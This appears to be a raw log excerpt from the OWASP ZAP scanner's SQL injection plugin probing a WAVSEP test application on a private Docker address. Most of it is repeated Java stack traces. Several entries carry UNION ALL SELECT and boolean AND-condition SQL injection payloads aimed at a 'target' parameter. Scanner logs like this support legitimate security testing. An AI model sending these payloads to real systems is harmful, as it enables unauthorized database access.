org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681571 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681572 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681573 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681574 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681574 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 9681598 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 5785=7033 AND (7907=7907] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 5785=7033 AND (7907=7907 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681598 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com) AND 6551=6247 AND (6891=6891] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com) AND 6551=6247 AND (6891=6891 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681599 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 8204=8204 AND (8767=8767] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 8204=8204 AND (8767=8767 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681599 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com) AND 4521=4521 AND (4512=4512] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com) AND 4521=4521 AND (4512=4512 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681600 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com) AND 6551=6247 AND (6891=6891] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com) AND 6551=6247 AND (6891=6891 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681600 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 5785=7033 AND (7907=7907] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 5785=7033 AND (7907=7907 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681601 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com AND 9609=9301] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com AND 9609=9301 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681602 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com AND 6189=6189] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com AND 6189=6189 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681603 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 3479=1479] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 3479=1479 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681603 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com AND 9609=9301] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com AND 9609=9301 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at 